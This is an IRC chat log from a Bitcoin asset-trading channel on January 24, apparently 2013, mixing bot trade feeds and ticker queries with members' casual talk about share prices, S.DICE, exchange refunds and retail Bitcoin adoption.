[O.BTCUSD.C200N] 5 @ 0.19895192 = 0.9948 BTC [+] Jan 24 15:17:26 [MPEX] [S.MPOE] 1214 @ 0.00062361 = 0.7571 BTC [+] Jan 24 15:17:28 [MPEX] [S.MPOE] 14646 @ 0.00062363 = 9.1337 BTC [+] Jan 24 15:36:15 ;;bc,24hprc Jan 24 15:36:16 18.01 Jan 24 15:38:04 !!! Jan 24 15:39:56 [MPEX] [S.MPOE] 6738 @ 0.00061939 = 4.1734 BTC [-] Jan 24 15:39:58 [MPEX] [S.MPOE] 2200 @ 0.00061935 = 1.3626 BTC [-] Jan 24 15:39:59 [MPEX] [S.MPOE] 14062 @ 0.00061112 = 8.5936 BTC [-] Jan 24 15:44:34 ;;bids 20 Jan 24 15:44:36 There are currently 0 bitcoins demanded at or over 20.0 USD, worth 0.0 USD in total. Jan 24 15:44:45 ;;bids 18 Jan 24 15:44:47 There are currently 6778.2965 bitcoins demanded at or over 18.0 USD, worth 122876.220554 USD in total. Jan 24 15:45:00 ;;asks 20 Jan 24 15:45:02 There are currently 20896.425 bitcoins offered at or under 20.0 USD, worth 406395.170917 USD in total. Jan 24 15:45:12 ;;asks 20 Jan 24 15:45:14 There are currently 20896.425 bitcoins offered at or under 20.0 USD, worth 406395.170917 USD in total. Jan 24 15:45:40 [MPEX] [S.MPOE] 10000 @ 0.00062362 = 6.2362 BTC [+] Jan 24 15:45:43 [MPEX] [S.MPOE] 9104 @ 0.00062363 = 5.6775 BTC [+] Jan 24 15:45:44 [MPEX] [S.MPOE] 13353 @ 0.00062412 = 8.3339 BTC [+] Jan 24 15:45:44 [MPEX] [S.MPOE] 12900 @ 0.00062431 = 8.0536 BTC [+] Jan 24 15:45:46 [MPEX] [S.MPOE] 4875 @ 0.00062453 = 3.0446 BTC [+] Jan 24 15:48:24 [MPEX] [S.MPOE] 3284 @ 0.00061112 = 2.0069 BTC [-] Jan 24 15:48:30 [MPEX] [S.MPOE] 8266 @ 0.00061072 = 5.0482 BTC [-] Jan 24 15:53:24 !help Jan 24 15:53:24 List of commands: Jan 24 15:53:25 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Jan 24 16:00:05 is this sustainable? Jan 24 16:02:15 [MPEX] [S.DICE] 100 @ 0.00626855 = 0.6269 BTC [-] Jan 24 16:12:09 ;;ticker Jan 24 16:12:09 BTCUSD ticker | Best bid: 18.57001, Best ask: 18.59000, Bid-ask spread: 0.01999, Last trade: 18.59000, 24 hour volume: 78383.80738228, 24 hour low: 17.20000, 24 hour high: 19.00000, 24 hour vwap: 18.05618 Jan 24 16:12:15 omg Jan 24 16:17:32 [MPEX] [S.MPOE] 9400 @ 0.00061527 = 5.7835 BTC [+] Jan 24 16:17:34 [MPEX] [S.MPOE] 6987 @ 0.00062453 = 4.3636 BTC [+] Jan 24 16:24:25 mircea_popescu: i summon thee from the depths! Jan 24 16:24:29 jkjk Jan 24 16:25:52 [MPEX] [S.MPOE] 11150 @ 0.00061072 = 6.8095 BTC [-] Jan 24 16:26:40 so what happened to matthew_'s "CREATE" asset? I don't see it on btct.co. Moderators nixed it? Jan 24 16:27:08 what was CREATE? Jan 24 16:31:34 ;;seen Namworld Jan 24 16:31:34 Namworld was last seen in #bitcoin-assets 6 hours, 55 minutes, and 7 seconds ago: Would definitly have caught lots of S.DICE Jan 24 16:31:51 thestringpuller: it was supposed to be somebody wanted to raise the money to buy a 3d printer via shares and had some wishful model of earning repayment Jan 24 16:32:00 I also don't see Jan 24 16:32:07 "COINURL-UPAGAIN" from ltc-global Jan 24 16:32:45 wishful Jan 24 16:33:05 spam my links for free coins yo Jan 24 16:34:38 [MPEX] [S.MPOE] 688 @ 0.00062453 = 0.4297 BTC [+] Jan 24 16:34:40 [MPEX] [S.MPOE] 11268 @ 0.00062484 = 7.0407 BTC [+] Jan 24 16:34:41 [MPEX] [S.MPOE] 28550 @ 0.00062491 = 17.8412 BTC [+] Jan 24 16:34:43 [MPEX] [S.MPOE] 6794 @ 0.00062535 = 4.2486 BTC [+] Jan 24 16:36:47 !ticker h sdice Jan 24 16:36:49 [HAVELOCK:SDICE] 1D: 0.53000000 / 0.56613659 / 0.58900000 (205 shares, 116.05800016 BTC), 7D: 0.48100000 / 0.54961742 / 0.62000000 (832 shares, 457.28168950 BTC), 30D: 0.37000000 / 0.47150724 / 0.62000000 (4376 shares, 2063.31568948 BTC) Jan 24 16:38:50 coinurl will continue to be bad Jan 24 16:39:08 Wotcha guys Jan 24 16:39:22 Any ideas why this bet is still open? http://bitbet.us/bet/159/bitcoin-mtgox-18-00-before-march-1st-2013/ Jan 24 16:40:47 [MPEX] [S.DICE] 1045 @ 0.00617711 = 6.4551 BTC [-] Jan 24 16:44:47 http://dollarvigilante.com/blog/2013/1/23/on-the-fringe-of-the-dominant-financial-world.html Jan 24 16:44:47 [MPEX] [S.MPOE] 3311 @ 0.00061072 = 2.0221 BTC [-] Jan 24 16:54:07 [HAVELOCK] [KCIM] 1 @ 0.98911 BTC [+] Jan 24 16:54:17 [MPEX] [S.MPOE] 5141 @ 0.00062088 = 3.1919 BTC [+] Jan 24 16:55:07 [HAVELOCK] [SDICE] 5 @ 0.6 = 3 BTC [+] Jan 24 17:08:42 [MPEX] [S.MPOE] 14619 @ 0.0006225 = 9.1003 BTC [+] Jan 24 17:08:44 [MPEX] [S.MPOE] 8731 @ 0.00062535 = 5.4599 BTC [+] Jan 24 17:14:04 [MPEX] [S.DICE] 949 @ 0.00611028 = 5.7987 BTC [-] Jan 24 17:14:06 [MPEX] [S.DICE] 151 @ 0.00608472 = 0.9188 BTC [-] Jan 24 17:20:57 pigeons: CREATE is Garr255, the cognitive guy Jan 24 17:21:33 [MPEX] [S.MPOE] 9275 @ 0.00062535 = 5.8001 BTC [+] Jan 24 17:21:35 [MPEX] [S.MPOE] 5655 @ 0.00062771 = 3.5497 BTC [+] Jan 24 17:25:04 [MPEX] [S.MPOE] 3540 @ 0.00062088 = 2.1979 BTC [-] Jan 24 17:25:06 [MPEX] [S.MPOE] 1809 @ 0.00061072 = 1.1048 BTC [-] Jan 24 17:37:07 [HAVELOCK] [SDICE] 35 @ 0.6 = 21 BTC [+] Jan 24 17:39:08 [HAVELOCK] [SDICE] 24 @ 0.59 = 14.16 BTC [-] Jan 24 17:39:53 !ticker mp s.dice Jan 24 17:39:55 [MPEX:S.DICE] 1D: 0.00085848 / 0.00388862 / 0.00699 (580455 shares, 2,257.17 BTC), 7D: 0.00085848 / 0.00446314 / 0.00699 (960166 shares, 4,285.36 BTC), 30D: 0.00085848 / 0.00416201 / 0.00699 (10201064 shares, 42,456.94 BTC) Jan 24 17:42:03 http://www.businessweek.com/articles/2013-01-23/missing-114-billion-from-u-dot-s-dot-banks Jan 24 17:42:06 teh plot. Jan 24 17:44:25 i have deposits piling up taking up space Jan 24 17:44:26 da2ce7 darkee| dasher DBordello deadweasek Diablo-D3 drug_motor dub dust-otc Jan 24 17:44:33 re: article Jan 24 17:44:38 deadweasek dun worry, late bets will be simply refunded. Jan 24 17:44:51 jcpham o ya ? Jan 24 17:45:08 ;;ticker Jan 24 17:45:09 BTCUSD ticker | Best bid: 18.65001, Best ask: 18.72819, Bid-ask spread: 0.07818, Last trade: 18.75000, 24 hour volume: 80260.71643879, 24 hour low: 17.20270, 24 hour high: 19.00000, 24 hour vwap: 18.09495 Jan 24 17:45:12 gott aget it out of the bank account at some point in time Jan 24 17:45:26 18.75 Jan 24 17:45:49 Also SP500 hits 1,501.33 Jan 24 17:46:10 wait, what? I was reading that how bitcoin dies blog post. Jan 24 17:46:12 what bet? Jan 24 17:46:21 Bugpowder ya but how much is it in rmb Jan 24 17:46:31 ;;ticker Jan 24 17:46:31 BTCUSD ticker | Best bid: 18.65001, Best ask: 18.69980, Bid-ask spread: 0.04979, Last trade: 18.75000, 24 hour volume: 80238.59030408, 24 hour low: 17.20270, 24 hour high: 19.00000, 24 hour vwap: 18.09525 Jan 24 17:46:48 deadweasek sorry wrong guy. Jan 24 17:47:03 dasher Any ideas why this bet is still open? << dun worry, late bets will be simply refunded. Jan 24 17:47:07 [HAVELOCK] [SDICE] 26 @ 0.59 = 15.34 BTC [-] Jan 24 17:47:12 !ticker m s.dice Jan 24 17:47:14 [MPEX:S.DICE] 1D: 0.00085848 / 0.00388862 / 0.00699 (580455 shares, 2,257.17 BTC), 7D: 0.00085848 / 0.00446314 / 0.00699 (960166 shares, 4,285.36 BTC), 30D: 0.00085848 / 0.00416201 / 0.00699 (10201064 shares, 42,456.94 BTC) Jan 24 17:47:34 Nope Mircea - the other one along the same lines has closed.. so _shrugs_ Jan 24 17:47:54 :rereads: Jan 24 17:48:05 yea. Jan 24 17:48:13 heh - just looking to reroll winnings into other bets :) Jan 24 17:48:23 :) Jan 24 17:49:03 was quite the night for s.dice i see Jan 24 17:49:09 someone fuck up their order? Jan 24 17:49:36 do price|amount instead of amount|price Jan 24 17:49:37 ? Jan 24 17:50:53 i benefited, i had 10000 bid at 0.52, whoop Jan 24 17:51:12 err 0.0052 Jan 24 17:51:16 that's what they suspect. Jan 24 17:51:30 http://trilema.com/2013/marketplace-excitement-with-expert-commentary-for-your-vicarious-trading-pleasure/ chatlog for posterity. Jan 24 17:54:27 ;;ticker Jan 24 17:54:28 BTCUSD ticker | Best bid: 18.75000, Best ask: 18.79990, Bid-ask spread: 0.04990, Last trade: 18.79990, 24 hour volume: 79765.51885946, 24 hour low: 17.20270, 24 hour high: 19.00000, 24 hour vwap: 18.11603 Jan 24 17:54:37 remarkably low volume on gox Jan 24 17:56:35 [MPEX] [S.MPOE] 9400 @ 0.00062455 = 5.8708 BTC [+] Jan 24 17:57:44 [MPEX] [S.MPOE] 500 @ 0.00062683 = 0.3134 BTC [+] Jan 24 17:57:46 [MPEX] [S.MPOE] 4450 @ 0.00061338 = 2.7295 BTC [-] Jan 24 17:57:47 [MPEX] [S.MPOE] 3600 @ 0.00061072 = 2.1986 BTC [-] Jan 24 17:58:08 idiot here --> on the bitcoinity.org/markets site, do the green bid bars and red ask bars mean something more when they cross the midline? Jan 24 17:59:41 just bid/ask volumes it would seem Jan 24 18:01:36 [MPEX] [S.MPOE] 2614 @ 0.00061072 = 1.5964 BTC [-] Jan 24 18:01:38 [MPEX] [S.MPOE] 17986 @ 0.00060917 = 10.9565 BTC [-] Jan 24 18:02:02 left Y axis goes from zero to 7000, right Y axis goes from 10k to -10k .... trying to sort that one out. Left Y axis is volume, but the bars don't start at the bottom. Jan 24 18:03:25 bah, it's not like this market is predictable. Jan 24 18:06:25 here we go Jan 24 18:07:01 ;;ticker Jan 24 18:07:02 BTCUSD ticker | Best bid: 18.70381, Best ask: 18.83999, Bid-ask spread: 0.13618, Last trade: 18.84000, 24 hour volume: 78585.09866303, 24 hour low: 17.25201, 24 hour high: 19.00000, 24 hour vwap: 18.14858 Jan 24 18:07:40 what is a 24 hour vwap? Jan 24 18:10:40 deadweasek: volume weighted average price Jan 24 18:11:28 thnks Jan 24 18:14:52 [MPEX] [S.MPOE] 467 @ 0.00060917 = 0.2845 BTC [-] Jan 24 18:14:54 [MPEX] [S.MPOE] 3047 @ 0.0006084 = 1.8538 BTC [-] Jan 24 18:14:54 [MPEX] [S.MPOE] 12546 @ 0.00060745 = 7.6211 BTC [-] Jan 24 18:19:37 Bugpowder here we go what where ? Jan 24 18:21:20 up up and away? Jan 24 18:26:17 o is it ? Jan 24 18:27:45 derp. no it's not. Jan 24 18:28:07 ;;ticker Jan 24 18:28:08 BTCUSD ticker | Best bid: 18.72801, Best ask: 18.78999, Bid-ask spread: 0.06198, Last trade: 18.72752, 24 hour volume: 78333.41354544, 24 hour low: 17.25201, 24 hour high: 19.00000, 24 hour vwap: 18.15736 Jan 24 18:29:56 im suing Bugpowder for emotional distress because i was all hopeful and shit and he mislead my feelings Jan 24 18:33:21 sue damages in BTC Jan 24 18:33:50 no in zanzibar dollars. Jan 24 18:33:55 btc is a ponzi Jan 24 18:34:10 http://unqualified-reservations.blogspot.com/2013/01/how-bitcoin-dies.html Jan 24 18:34:29 https://bitcointalk.org/index.php?topic=138259.msg1475828#msg1475828 Bugpowder may wanna tell 'em ? :D Jan 24 18:34:50 how bitcoin dies -- i hope people get to the comments. Jan 24 18:35:08 [MPEX] [S.DICE] 1849 @ 0.00608472 = 11.2506 BTC [-] Jan 24 18:35:10 [MPEX] [S.DICE] 1269 @ 0.00605027 = 7.6778 BTC [-] Jan 24 18:35:11 [MPEX] [S.DICE] 3450 @ 0.00604854 = 20.8675 BTC [-] Jan 24 18:35:17 i had an exchange with the guy where he was explaining to me why mpex doesn't work Jan 24 18:35:27 so maybe take it with a grain of salty brine. Jan 24 18:36:06 [MPEX] [S.MPOE] 5515 @ 0.00062771 = 3.4618 BTC [+] Jan 24 18:36:14 just reading trilema...so coinurl was sold, like, domain, code,everything... but without any btc balances? that's genial Jan 24 18:36:34 i'm totally selling coinbr in such manner, anyone? Jan 24 18:37:03 1 btc Jan 24 18:38:08 [HAVELOCK] [SDICE] 1 @ 0.58 BTC [-] Jan 24 18:38:24 nobody else? Jan 24 18:40:07 1btc, bah. i'll rathher put it to bitmit Jan 24 18:40:35 Dude, seriously, enough with this bullshit. Nobody cares about the US. Literally, nobody. Jan 24 18:40:35 If tomorrow some douche in the colonies "unseals" - heh, aren't we uppity & pretentious all of a sudden, unsealing shit and whatnot - whatever the hell he pleases it's going to make the proverbial sound of the tree falling in the empty forest. Jan 24 18:40:35 All this aside, if you ever get some Bitcoin together to put in the general vicinty of your disproportionately large mouth, you know where to buy the PUTs. Jan 24 18:40:45 so the question is, does mr smartass buy the puts nao. Jan 24 18:41:05 jurov lol myeah. those doods are incredible, seriously. Jan 24 18:41:28 that mclovin character was running memcached as a process from a memcache user and didn't then know what he's running. Jan 24 18:41:47 or why "niothing happens". or why cpu is at 2% but the server crawls. Jan 24 18:43:07 [HAVELOCK] [SDICE] 50 @ 0.58 = 29 BTC [-] Jan 24 18:43:14 ;;ticker Jan 24 18:43:14 BTCUSD ticker | Best bid: 19.01000, Best ask: 19.01098, Bid-ask spread: 0.00098, Last trade: 19.01000, 24 hour volume: 82712.54948507, 24 hour low: 17.25201, 24 hour high: 19.01000, 24 hour vwap: 18.20757 Jan 24 18:43:32 broke 19 bitches Jan 24 18:44:34 hey, 2nd time today. Jan 24 18:44:49 it managed to go above though Jan 24 18:44:50 mircea_popescu: looks like coinurl will continue to suck Jan 24 18:45:02 yeah. Jan 24 18:45:07 and so another bubble forms Jan 24 18:46:25 i just realised that mpex is actually likely to survive longer than the us federal government. Jan 24 18:47:29 ^^^ eskimobob, you don't have anything to say about that?? Jan 24 18:47:41 dasher, no, thanks for noticing Jan 24 18:47:50 ;;ticker Jan 24 18:47:51 BTCUSD ticker | Best bid: 19.02240, Best ask: 19.03475, Bid-ask spread: 0.01235, Last trade: 19.02240, 24 hour volume: 82880.87173367, 24 hour low: 17.25201, 24 hour high: 19.04000, 24 hour vwap: 18.21658 Jan 24 18:48:06 Shitsnacks, we're at 19 Jan 24 18:48:40 dun dun dun! Jan 24 18:48:52 humm.. it's still open & accepting bets... Jan 24 18:49:03 there must be some tech startup who just sold his company to google getting in on bitcoin. Maybe he's gonna pump it up and dump it all? Jan 24 18:49:31 that's not really a +ev strategy Jan 24 18:49:33 dasher, it will be handled now and be late bets will be reveresd Jan 24 18:49:40 i have a wild imagination. Jan 24 18:49:57 be = the Jan 24 18:50:01 close enough. Jan 24 18:50:42 !ticker m s.dice Jan 24 18:50:44 [MPEX:S.DICE] 1D: 0.00085848 / 0.00390866 / 0.00699 (585823 shares, 2,289.78 BTC), 7D: 0.00085848 / 0.00447325 / 0.00699 (966234 shares, 4,322.21 BTC), 30D: 0.00085848 / 0.00416323 / 0.00699 (10207632 shares, 42,496.73 BTC) Jan 24 18:52:08 [HAVELOCK] [SDICE] 5 @ 0.575 = 2.875 BTC [-] Jan 24 18:52:24 ::bids 19 Jan 24 18:52:28 ;;bids 19 Jan 24 18:52:31 There are currently 8.2829881 bitcoins demanded at or over 19.0 USD, worth 157.738160861 USD in total. Jan 24 18:52:43 lol Jan 24 18:52:49 :) Jan 24 18:53:08 [HAVELOCK] [SDICE] 10 @ 0.561 = 5.61 BTC [-] Jan 24 18:53:25 ;;bids 18 Jan 24 18:53:27 There are currently 8588.2369 bitcoins demanded at or over 18.0 USD, worth 158032.392631 USD in total. Jan 24 18:53:47 ;;bids 18.5 Jan 24 18:53:49 There are currently 3632.5744 bitcoins demanded at or over 18.5 USD, worth 68002.9997632 USD in total. Jan 24 18:54:08 [HAVELOCK] [SDICE] 1 @ 0.56000001 BTC [-] Jan 24 18:55:09 [HAVELOCK] [SDICE] 5 @ 0.56000001 = 2.8 BTC [-] Jan 24 18:55:11 [HAVELOCK] [SDICE] 6 @ 0.516 = 3.096 BTC [-] Jan 24 18:55:12 [MPEX] [S.MPOE] 23200 @ 0.00062151 = 14.419 BTC [-] Jan 24 18:55:36 basically lets copy the forbes article http://arstechnica.com/business/2013/01/bitcoin-based-casino-rakes-in-over-500000-profit-in-six-months/ Jan 24 18:55:45 yeah Jan 24 18:55:50 then wired re-ran Jan 24 18:56:01 ;;asks 99 Jan 24 18:56:03 There are currently 40126.935 bitcoins offered at or under 99.0 USD, worth 1137303.98882 USD in total. Jan 24 18:57:01 so in the end what's the story with basic, did they refund or didn't they refund ? Jan 24 18:57:18 basic is dead Jan 24 18:57:24 returning the funds Jan 24 18:58:06 a, so it's not done yet ? i had the notion from reading tom's drivel that it's 90% done three days ago Jan 24 18:58:35 done what? Jan 24 18:58:52 everyone is pulling their money out Jan 24 18:59:00 so they decided they wont go fwd with it Jan 24 18:59:08 [MPEX] [S.MPOE] 6000 @ 0.00062151 = 3.7291 BTC [-] Jan 24 18:59:10 [MPEX] [S.MPOE] 1090 @ 0.00062563 = 0.6819 BTC [+] Jan 24 18:59:11 the refunds, done. Jan 24 18:59:14 and just return the money to whoever was left Jan 24 18:59:20 these take time apparently Jan 24 19:00:03 ok he erased the post where he was selling his fpga chips off Jan 24 19:00:05 heh. Jan 24 19:00:28 https://www.btcfpga.com/forum/index.php?topic=1048.0 Jan 24 19:00:34 the only msg left on the whole forum Jan 24 19:00:37 I have the list of BTC Refunds and should be making those today. Jan 24 19:00:37 All other CC orders will automatically be refunded today. Jan 24 19:00:54 this, to me at least, says refunds were done already Jan 24 19:01:01 dunno Jan 24 19:01:12 anyway. Jan 24 19:01:34 https://bitcointalk.org/index.php?topic=138090.msg1475792#msg1475792 Jan 24 19:01:42 according to eskimoblob i run the entire world by now. Jan 24 19:02:12 anyway, back to tom : "this forum will be locked from this point forward - if I need to tell you anything else I will post again otherwise you will not hear from me - your refund will come automatically and theres no reason for communication." Jan 24 19:02:14 o.o Jan 24 19:02:28 o o Jan 24 19:02:34 put me in charge of ministry of sillywalks pls Jan 24 19:02:38 lol Jan 24 19:02:45 well, can you do a real silly walk ? Jan 24 19:02:58 let me demonstrate, Jan 24 19:03:08 i have been developing this walk since the high school Jan 24 19:03:28 what'd ya think' Jan 24 19:03:50 basic got chargeback'd Jan 24 19:03:54 It's not particularly silly, is it? I mean, the right leg isn't silly at all and the left leg merely does a forward aerial half turn every alternate step. Jan 24 19:04:00 from my perspective Jan 24 19:04:08 fuck them and their payment processor Jan 24 19:04:12 mircea_popescu ;))) Jan 24 19:04:18 who was their pp ? bitpayy ? Jan 24 19:04:25 cc Jan 24 19:04:39 i paid with 120 days of credit card window goodness Jan 24 19:04:53 i srsly don't understand ppl trying to push bitcoin for retail. Jan 24 19:05:02 stupidiest idea ever Jan 24 19:05:06 i mean... merchants are insured, customers get cb's. Jan 24 19:05:12 whereas in bitcoin its INSANITY Jan 24 19:05:34 i don't how how i'd sell a small merchant on taking btc. it makes no business sense at all. Jan 24 19:05:36 buying computer hardware, of all things Jan 24 19:05:38 with bitcoin Jan 24 19:05:41 smh Jan 24 19:05:49 but hey, i prefer to think the retaul btc people just know shit better than me. Jan 24 19:05:50 !ticker h sdice Jan 24 19:05:52 [HAVELOCK:SDICE] 1D: 0.51600000 / 0.57404839 / 0.60000000 (372 shares, 213.54600022 BTC), 7D: 0.48100000 / 0.55883394 / 0.62000000 (866 shares, 483.95018966 BTC), 30D: 0.37000000 / 0.47564628 / 0.62000000 (4544 shares, 2161.33668954 BTC) Jan 24 19:06:01 what do you think the psychological reaction will be IF we hit 20? Jan 24 19:06:11 i get the idea of retail bitcoin Jan 24 19:06:12 deadweasek forum spam increase +11 Jan 24 19:06:21 but pre-ordering computer hardware with it Jan 24 19:06:27 bad idea Jan 24 19:06:31 i'm sorry, what's that? Jan 24 19:06:41 first time here, ya know Jan 24 19:06:44 jcpham it's not really hardware in any way. it's more like verysoft ware. Jan 24 19:06:56 deadweasek forum -> bitcointalk.org Jan 24 19:06:58 you are correct Jan 24 19:07:08 i'll be quiet then. Jan 24 19:07:12 but it comes in plastic case so we can call it hardware Jan 24 19:07:14 sorta like brie cheeseware. Jan 24 19:07:20 moore's law should apply to it Jan 24 19:07:32 deadweasek i just meant, the only effect of btc going over 20 will be a buncha people posting more on forum Jan 24 19:07:45 which means you shouldn't spend deflationary money on thing governed by Moore Jan 24 19:07:49 ah, i see. thx Jan 24 19:08:00 jcpham fanware ? Jan 24 19:08:09 i think fanware is particularly appropriate. Jan 24 19:08:15 it's a box of fans sold to a buncha fans. Jan 24 19:08:17 power supply ware Jan 24 19:08:25 fanware is good Jan 24 19:08:27 i like it Jan 24 19:10:00 I knew it! Jan 24 19:10:07 Went to lunch Jan 24 19:10:10 19.15 Jan 24 19:10:18 ;;bc,24hprc Jan 24 19:10:19 18.23 Jan 24 19:10:25 come onnnnn Jan 24 19:10:29 Bugpowder go to dinner quikcly. Jan 24 19:10:32 lol Jan 24 19:10:40 i dunno if any of you know fantozzi Jan 24 19:10:51 but he's this italian comedy guy. unfortunate accountant. Jan 24 19:11:09 one time he goes on a trip with the megadirettore generale who's an invederate gambler Jan 24 19:11:35 and ends up drinking galons of the world's most carbonated mineral water because the director guy thinks fantozzi has to keep doing what he was doing when the director got good cards. for hours. Jan 24 19:11:49 so, bugpowder, EAT MAN Jan 24 19:12:16 and let it better be sante fe rice ! Jan 24 19:12:35 nah, bbq ribs Jan 24 19:19:22 so over 20 or not over 20 ? Jan 24 19:19:25 ;;asks 20 Jan 24 19:19:27 There are currently 12905.743 bitcoins offered at or under 20.0 USD, worth 254721.219965 USD in total. Jan 24 19:19:33 mircea_popescu make a bet Jan 24 19:19:43 where can I find a long list of all trades / price / volume that updates? Jan 24 19:19:59 ;;ticker Jan 24 19:19:59 BTCUSD ticker | Best bid: 19.01879, Best ask: 19.05000, Bid-ask spread: 0.03121, Last trade: 19.01879, 24 hour volume: 87334.42598055, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.26906 Jan 24 19:20:14 Bugpowder https://bitcointalk.org/index.php?topic=85687.msg1476190#msg1476190 you have your work cut out for you Jan 24 19:26:50 ;;bids 18.9 Jan 24 19:26:52 There are currently 114.58398 bitcoins demanded at or over 18.9 USD, worth 2168.8533383 USD in total. Jan 24 19:27:11 ;;asks 18.9 Jan 24 19:27:13 There are currently 0 bitcoins offered at or under 18.9 USD, worth 0.0 USD in total. Jan 24 19:27:33 don't laugh, i'm learning Jan 24 19:28:04 we are all serial. Jan 24 19:30:58 ;;asks 18.9 Jan 24 19:31:00 There are currently 9.7825458 bitcoins offered at or under 18.9 USD, worth 184.890114864 USD in total. Jan 24 19:31:34 ;;asks 19.5 Jan 24 19:31:36 There are currently 4182.6565 bitcoins offered at or under 19.5 USD, worth 80674.7192724 USD in total. Jan 24 19:31:48 ;;bids 18.5 Jan 24 19:31:50 There are currently 1948.0083 bitcoins demanded at or over 18.5 USD, worth 36316.6269025 USD in total. Jan 24 19:32:11 ;;ticker Jan 24 19:32:12 BTCUSD ticker | Best bid: 18.69115, Best ask: 18.70000, Bid-ask spread: 0.00885, Last trade: 18.70000, 24 hour volume: 89489.10759434, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.28997 Jan 24 19:32:55 volume up 2.3k in 20 minutes Jan 24 19:37:03 I should go back to lunch! Jan 24 19:37:44 ;;bc,stats Jan 24 19:37:46 Current Blocks: 217868 | Current Difficulty: 2968775.3320751 | Next Difficulty At Block: 219743 | Next Difficulty In: 1875 blocks | Next Difficulty In About: 1 week, 5 days, 15 hours, 7 minutes, and 30 seconds | Next Difficulty Estimate: 3082762.10767147 | Estimated Percent Change: 3.83952178411 Jan 24 19:37:51 ;;bc,24hprc Jan 24 19:37:52 18.26 Jan 24 19:40:41 go to breakfast while you're at it Jan 24 19:40:59 ;;bc,24hprc Jan 24 19:41:00 18.28 Jan 24 19:41:08 [HAVELOCK] [KCIM] 4 @ 1 = 4 BTC [+] Jan 24 19:41:10 [HAVELOCK] [KCIM] 2 @ 1 = 2 BTC [+] Jan 24 19:41:17 the good news is that the selloff actually drives the 24hprc up Jan 24 19:41:23 we need trading volume Jan 24 19:42:08 [HAVELOCK] [SDICE] 4 @ 0.516 = 2.064 BTC [-] Jan 24 19:42:10 [HAVELOCK] [SDICE] 1 @ 0.515 BTC [-] Jan 24 19:42:10 [HAVELOCK] [SDICE] 10 @ 0.481 = 4.81 BTC [-] Jan 24 19:42:11 any trade that goes off over 24hprc I am happy with Jan 24 19:42:11 [HAVELOCK] [SDICE] 8 @ 0.48 = 3.84 BTC [-] Jan 24 19:42:58 what is the H in hprc? Jan 24 19:43:28 hour Jan 24 19:43:28 hour Jan 24 19:43:31 drat Jan 24 19:43:32 24hour price Jan 24 19:43:49 ;;ticker Jan 24 19:43:50 BTCUSD ticker | Best bid: 18.29000, Best ask: 18.30000, Bid-ask spread: 0.01000, Last trade: 18.30000, 24 hour volume: 95033.95842525, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.30738 Jan 24 19:43:57 whoa wasn't it 19 ?! Jan 24 19:44:13 ;;ident smickles Jan 24 19:44:13 Nick 'smickles', with hostmask 'smickles!~smickles@67.222.146.32', is not identified. Jan 24 19:44:18 ;;getrating smickles Jan 24 19:44:19 WARNING: Currently not authenticated. User smickles, rated since Wed Jan 4 18:28:52 2012. Cumulative rating 86, from 49 total ratings. Received ratings: 48 positive, 1 negative. Sent ratings: 47 positive, 6 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=smickles Jan 24 19:44:22 it was bound to happen eventually Jan 24 19:44:38 I was expecting a $1 plummet the other day, but looks like today was the day instead Jan 24 19:45:21 and now a wall is beginning to develop Jan 24 19:46:16 ;;ticker Jan 24 19:46:17 BTCUSD ticker | Best bid: 18.31000, Best ask: 18.41000, Bid-ask spread: 0.10000, Last trade: 18.41000, 24 hour volume: 95812.05183024, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.30787 Jan 24 19:46:36 the guy that bot the C180,190,200s is feeling sad Jan 24 19:47:00 ;calc 27000*.056 Jan 24 19:47:07 ;;calc 27000*.056 Jan 24 19:47:08 1512 Jan 24 19:47:19 Bugpowder if he overhedged yes. otherwise he's prolly going sigh of relief Jan 24 19:48:12 volume up 10k in 20 minutes Jan 24 19:48:44 [MPEX] [S.MPOE] 8492 @ 0.00062563 = 5.3128 BTC [+] Jan 24 19:51:23 [BTCTC] [RSM] 1 @ 0.0085 BTC [+] Jan 24 19:52:42 [BTCTC] [RSM] 220 @ 0.007 = 1.54 BTC [-] Jan 24 19:53:02 ;;ask 18;;ticker Jan 24 19:53:02 Error: "ask" is not a valid command. Jan 24 19:53:05 ;ticker Jan 24 19:53:07 ;;ticker Jan 24 19:53:08 BTCUSD ticker | Best bid: 18.58724, Best ask: 18.60670, Bid-ask spread: 0.01946, Last trade: 18.61215, 24 hour volume: 98078.71436442, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.30869 Jan 24 19:56:27 rally on Jan 24 19:56:54 ;;ticker Jan 24 19:56:55 BTCUSD ticker | Best bid: 18.62001, Best ask: 18.74899, Bid-ask spread: 0.12898, Last trade: 18.74899, 24 hour volume: 99276.17262119, 24 hour low: 17.25201, 24 hour high: 19.18999, 24 hour vwap: 18.31400 Jan 24 19:57:14 [MPEX] [O.BTCUSD.P330T] 1000 @ 0.8076674 = 807.6674 BTC [-] Jan 24 19:57:16 [MPEX] [O.BTCUSD.P340T] 1000 @ 0.86253611 = 862.5361 BTC [-] Jan 24 19:57:17 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.91740482 = 917.4048 BTC [-] Jan 24 19:57:19 lol good day to trade on gox Jan 24 19:57:32 o.o Jan 24 19:57:37 we back on this programme ?! Jan 24 19:57:43 ha Jan 24 20:00:09 [HAVELOCK] [SDICE] 3 @ 0.48 = 1.44 BTC [-] Jan 24 20:00:25 hey is the 2% mkopt fee on the deposit or the sale price? Jan 24 20:01:12 HI, I'm trying to understand how to install gribble, does anybody has experience? Jan 24 20:01:22 [MPEX] [O.BTCUSD.C120T] 900 @ 0.34565429 = 311.0889 BTC [+] Jan 24 20:01:34 you mean install as in run the bot yourself on a vps ? Jan 24 20:01:52 yes. Jan 24 20:01:56 Bugpowder sale price is unrelated Jan 24 20:02:09 Chilca i never ran a bot. nanotube maintains gribble. Jan 24 20:02:10 so its 0.02 per contract? Jan 24 20:02:29 for calls Jan 24 20:02:36 I see that, and I'm looking into the source code now Jan 24 20:02:53 ;;seen lautaro_ Jan 24 20:02:54 I have not seen lautaro_. Jan 24 20:02:56 ;;seen lautaro Jan 24 20:02:56 lautaro was last seen in #bitcoin-assets 11 hours, 10 minutes, and 9 seconds ago: Could this explain the buying in S.DICE: https://www.havelockinvestments.com/ ? Jan 24 20:04:03 [MPEX] [O.BTCUSD.C200T] 440 @ 0.05560548 = 24.4664 